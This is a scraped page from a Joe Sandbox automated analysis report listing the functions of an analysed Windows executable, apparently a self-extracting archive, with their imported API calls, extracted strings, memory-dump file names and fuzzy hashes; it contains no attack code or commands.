Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 0065b8142e065083fa66f0e529b0f111551f31fbf842b8717028e45fd58ca7a6
Instruction ID: 1c1d2bbe33b72b8856a04e69ac467561fbfc02d56bef7aa0b641bb1de9e17db4
Opcode Fuzzy Hash: 0065b8142e065083fa66f0e529b0f111551f31fbf842b8717028e45fd58ca7a6
Instruction Fuzzy Hash: F631BE71145742ABE711DF20AC4AFAB7BACFF8A704F00852CF65196190DB688A04C77A

Function 007CD78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 007CD7AE
ShellExecuteExW.SHELL32(?), ref: 007CD8DE
ShowWindow.USER32(?,00000000), ref: 007CD91D
GetExitCodeProcess.KERNEL32(?,?), ref: 007CD959
CloseHandle.KERNEL32(?), ref: 007CD97F
ShowWindow.USER32(?,00000001), ref: 007CD9E1

Strings

.exe, xrefs: 007CD989
.inf, xrefs: 007CD89A
h|, xrefs: 007CD92E
r|, xrefs: 007CD911
PDGu<|, xrefs: 007CD8DE

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf$PDGu<|$h|$r|
API String ID: 36480843-2959658334
Opcode ID: 5b1998e6ee52ef7961832cc0e2889f4d58ebe506c24646fdbf0738b64f383caf
Instruction ID: 3f7ccc4c5cc41e7ab0c460496f901ad57b67d0d5a83ca0f6a5d77a3520f71163
Opcode Fuzzy Hash: 5b1998e6ee52ef7961832cc0e2889f4d58ebe506c24646fdbf0738b64f383caf
Instruction Fuzzy Hash: E651D474508380AAEB309B249844FBBBBE4EF85744F04443EF9C597191E7BCAD44CB52

Function 007DA95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007D5695,007D5695,?,?,?,007DABAC,00000001,00000001,2DE85006), ref: 007DA9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007DABAC,00000001,00000001,2DE85006,?,?,?), ref: 007DAA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007DAB35
__freea.LIBCMT ref: 007DAB42

Part of subcall function 007D8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007DCA2C,00000000,?,007D6CBE,?,00000008,?,007D91E0,?,?,?), ref: 007D8E38

__freea.LIBCMT ref: 007DAB4B
__freea.LIBCMT ref: 007DAB70

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 920cb65613833fd236926bb9292ee98d29d0acda5ebfb274e00d84fcad2d118a
Instruction ID: e331b2b76afb3bc9cc7749a1358b17482769282a57a37dbfb73ba4421dcc8b36
Opcode Fuzzy Hash: 920cb65613833fd236926bb9292ee98d29d0acda5ebfb274e00d84fcad2d118a
Instruction Fuzzy Hash: 1851B0B2600216BBDB258F64CC85EAAB7BAFB44714B15466BFC04E6240EB78DC41C692

Function 007D3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,007D3C35,?,?,00812088,00000000,?,007D3D60,00000004,InitializeCriticalSectionEx,007E6394,InitializeCriticalSectionEx,00000000), ref: 007D3C03

Strings

api-ms-, xrefs: 007D3BC3

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: cff0d2034f23cd19c2e92ce02b01181ffcb6e9a0a42a3796f1b7e518049a3593
Instruction ID: 83d23a5e43c0e74b1fbb94fdc2dcaf849a997959ba998fcf35489e8910550254
Opcode Fuzzy Hash: cff0d2034f23cd19c2e92ce02b01181ffcb6e9a0a42a3796f1b7e518049a3593
Instruction Fuzzy Hash: AF110671A45220ABCB228B689C85B5D3778AF05770F250213E915FF3D0E779EF008AD6

Function 007CABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 007CABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 007CABF9

Part of subcall function 007C1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,007BC116,00000000,.exe,?,?,00000800,?,?,?,007C8E3C), ref: 007C1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 007CABE9

Strings

EDIT, xrefs: 007CABCD, 007CABD8, 007CABE5
@Ut, xrefs: 007CABF9

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Ut$EDIT
API String ID: 4243998846-2065656831
Opcode ID: c659557aa7133cceebef8617756a973bc6a2dca053e876d08702fcf86cbce892
Instruction ID: bebfecb33ad994325c848aea850c9ec9f44d21c8056f5e1fa365123225dd0fb3
Opcode Fuzzy Hash: c659557aa7133cceebef8617756a973bc6a2dca053e876d08702fcf86cbce892
Instruction Fuzzy Hash: 4EF0827660162976DB209A259C09FDB77ACAF4AB41F484029BA05A2180D768DE4186B6

Function 007CAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007C081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007C0836
Part of subcall function 007C081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007BF2D8,Crypt32.dll,00000000,007BF35C,?,?,007BF33E,?,?,?), ref: 007C0858

OleInitialize.OLE32(00000000), ref: 007CAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007CAC66
SHGetMalloc.SHELL32(007F8438), ref: 007CAC70

Strings

riched20.dll, xrefs: 007CAC1E
3Qo, xrefs: 007CAC47

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Qo
API String ID: 3498096277-4232643773
Opcode ID: 601faa5a3fb55e43245e00b41ca6d9ea1494f7081d43eeada7655cf77d6f8b6a
Instruction ID: deddbc60f50b49762f1bc94736b53f79ee0c96a65ccdb3d71d102f5f10df8e8c
Opcode Fuzzy Hash: 601faa5a3fb55e43245e00b41ca6d9ea1494f7081d43eeada7655cf77d6f8b6a
Instruction Fuzzy Hash: 8BF0FFB5900249ABCB10AFA9D8499EFFBFCEF84700F00415AA415E2251DBB856458FA1

Function 007B98E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,007B7760,?,00000005,?,00000011), ref: 007B995F
GetLastError.KERNEL32(?,?,007B7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007B996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,007B7760,?,00000005,?), ref: 007B99A2
GetLastError.KERNEL32(?,?,007B7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007B99AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,007B7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007B99F9

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 05ea6c1fc42c6522c481083e8ff0c5f286d14b8059253970d26062291c6aa185
Instruction ID: ceb488b8c8a8f9af1b388d38f4f1fbb351d96549e4ed0a1bb957be666f56e07e
Opcode Fuzzy Hash: 05ea6c1fc42c6522c481083e8ff0c5f286d14b8059253970d26062291c6aa185
Instruction Fuzzy Hash: D0310430545785AFE7709F24CC8ABDABB94BB84320F200B1DFBB1961D1D7B8A944CB95

Function 007CB568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007CB579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007CB58A
IsDialogMessageW.USER32(0001048C,?), ref: 007CB59E
TranslateMessage.USER32(?), ref: 007CB5AC
DispatchMessageW.USER32(?), ref: 007CB5B6

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: c1fe166cf154bd3da78d781fb9d466acb9fa6337d2790a5562681f570d29fd26
Instruction ID: c142c27f018712665942ff2ca2d7200b8de7ca0edafbf05821fa56327b5dccd6
Opcode Fuzzy Hash: c1fe166cf154bd3da78d781fb9d466acb9fa6337d2790a5562681f570d29fd26
Instruction Fuzzy Hash: 6DF07071A0111ABB8B209BE5EC4DEEB7FBCEE057917408419B919D2050EB78D615CBF0

Function 007CDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007CDBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007CDC30

Strings

sfxcmd, xrefs: 007CDBEF
sfxpar, xrefs: 007CDC2B

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: e9412d8deb937eff37fe866faddf1f16c6d4afb896f75da040af6bddf72308fb
Instruction ID: 5d4c9e0ca8061c92794410dd978377ad88166630602ec4588f0e3c7345c59b43
Opcode Fuzzy Hash: e9412d8deb937eff37fe866faddf1f16c6d4afb896f75da040af6bddf72308fb
Instruction Fuzzy Hash: D0F0A7B240666CEACB301B958C4EFFA3758AF09B81B04046DBD859A051E6BC8D40D6F0

Function 007B9785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 007B9795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 007B97AD
GetLastError.KERNEL32 ref: 007B97DF
GetLastError.KERNEL32 ref: 007B97FE

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: ea7b029e4722de4ffe33d1ab6ee815ee9c43a944ce966327eba9e253a21eb6ed
Instruction ID: 7ebd5455a58444d52b1df5eb5189d47b21af9079af978bef6ec6f1da1cc6e161
Opcode Fuzzy Hash: ea7b029e4722de4ffe33d1ab6ee815ee9c43a944ce966327eba9e253a21eb6ed
Instruction Fuzzy Hash: C0118230910614EBDF205F65C848BE93BE9FB46320F10892AF7368A190DB7C9E44DB61

Function 007DAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007BD710,00000000,00000000,?,007DACDB,007BD710,00000000,00000000,00000000,?,007DAED8,00000006,FlsSetValue), ref: 007DAD66
GetLastError.KERNEL32(?,007DACDB,007BD710,00000000,00000000,00000000,?,007DAED8,00000006,FlsSetValue,007E7970,FlsSetValue,00000000,00000364,?,007D98B7), ref: 007DAD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007DACDB,007BD710,00000000,00000000,00000000,?,007DAED8,00000006,FlsSetValue,007E7970,FlsSetValue,00000000), ref: 007DAD80

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 48ea87dc4155bb10238c8ec1d017f5c84e28e7f5948a0410770abb33fe71090a
Instruction ID: 624d4e80dfa1edeeaaf5d2f331218594af8d77ae2c43d8a5f1c7db30e53f6fe3
Opcode Fuzzy Hash: 48ea87dc4155bb10238c8ec1d017f5c84e28e7f5948a0410770abb33fe71090a
Instruction Fuzzy Hash: 90014732302222BBC7214E789C88A977B7EFF097A27204621F906DB754C728C800CAE1

Function 007DBA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 007D97E5: GetLastError.KERNEL32(?,007F1030,007D4674,007F1030,?,?,007D3F73,00000050,?,007F1030,00000200), ref: 007D97E9
Part of subcall function 007D97E5: _free.LIBCMT ref: 007D981C
Part of subcall function 007D97E5: SetLastError.KERNEL32(00000000,?,007F1030,00000200), ref: 007D985D
Part of subcall function 007D97E5: _abort.LIBCMT ref: 007D9863

Part of subcall function 007DBB4E: _abort.LIBCMT ref: 007DBB80
Part of subcall function 007DBB4E: _free.LIBCMT ref: 007DBBB4

Part of subcall function 007DB7BB: GetOEMCP.KERNEL32(00000000,?,?,007DBA44,?), ref: 007DB7E6

_free.LIBCMT ref: 007DBA9F
_free.LIBCMT ref: 007DBAD5

Strings

p~, xrefs: 007DBAC9

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: p~
API String ID: 2991157371-2570613599
Opcode ID: 0e4a78c5c4ce9b444537f7391c7184ae405edd418a6fb19fba6aebfaa71c2ce5
Instruction ID: 3a0fb878367688dd74319705995f77355ce6856b68523d25f5edfd5c3ad809e2
Opcode Fuzzy Hash: 0e4a78c5c4ce9b444537f7391c7184ae405edd418a6fb19fba6aebfaa71c2ce5
Instruction Fuzzy Hash: 6731EB31904209EFDB10DFA8D845BAD77F5EF84320F66809BE5049B3A2EB3A9D40DB50

Function 007CE532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE51F

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

2|, xrefs: 007CE532
PDGu<|, xrefs: 007CE519

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 2|$PDGu<|
API String ID: 1269201914-464907201
Opcode ID: ccf8f2f6273817b47cba56cd3367ec989f9be5c3428227665954b1909a9ef67b
Instruction ID: bfd2973d5d384e3b6ad6cd6df8c07a777ff18df6fbb79ddff2bd9e36c75078f7
Opcode Fuzzy Hash: ccf8f2f6273817b47cba56cd3367ec989f9be5c3428227665954b1909a9ef67b
Instruction Fuzzy Hash: D8B012C565AA40BD310492492C06F3F13DCD4C9F10330502EF404C0080E8480C450431

Function 007CE528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE51F

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

PDGu<|, xrefs: 007CE519
(|, xrefs: 007CE528

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (|$PDGu<|
API String ID: 1269201914-953682328
Opcode ID: 5c9d28cb393bcbcfc0cc51254d8cecb88106ff10fd7620403d0d8d7ceb1f0373
Instruction ID: fc03d015590df3aa91b198ed7900f993b383fc8c1542a86bad3ea92a1edb2734
Opcode Fuzzy Hash: 5c9d28cb393bcbcfc0cc51254d8cecb88106ff10fd7620403d0d8d7ceb1f0373
Instruction Fuzzy Hash: B8B012C565AA80BC310452492D06E3F17DCC4C9F10330902EF504C0080E8480C460431

Function 007B9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,007BD343,00000001,?,?,?,00000000,007C551D,?,?,?), ref: 007B9F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,007C551D,?,?,?,?,?,007C4FC7,?), ref: 007B9FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,007BD343,00000001,?,?), ref: 007BA011

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: c5f7288f89d02748055532a374e0b65cba862a59e425881e2fac170bfaebbe6f
Instruction ID: 0743d7172d46a2b6f5a2a8752a0d27b71904804f437909ad7f14b462fb330dcf
Opcode Fuzzy Hash: c5f7288f89d02748055532a374e0b65cba862a59e425881e2fac170bfaebbe6f
Instruction Fuzzy Hash: E031A231204345AFDB14DF20D848BBE77A5FF84721F044519F6919B290DB799D48CBA2

Function 007BA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 007BC27E: _wcslen.LIBCMT ref: 007BC284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,007BA175,?,00000001,00000000,?,?), ref: 007BA2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,007BA175,?,00000001,00000000,?,?), ref: 007BA30C
GetLastError.KERNEL32(?,?,?,?,007BA175,?,00000001,00000000,?,?), ref: 007BA329

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
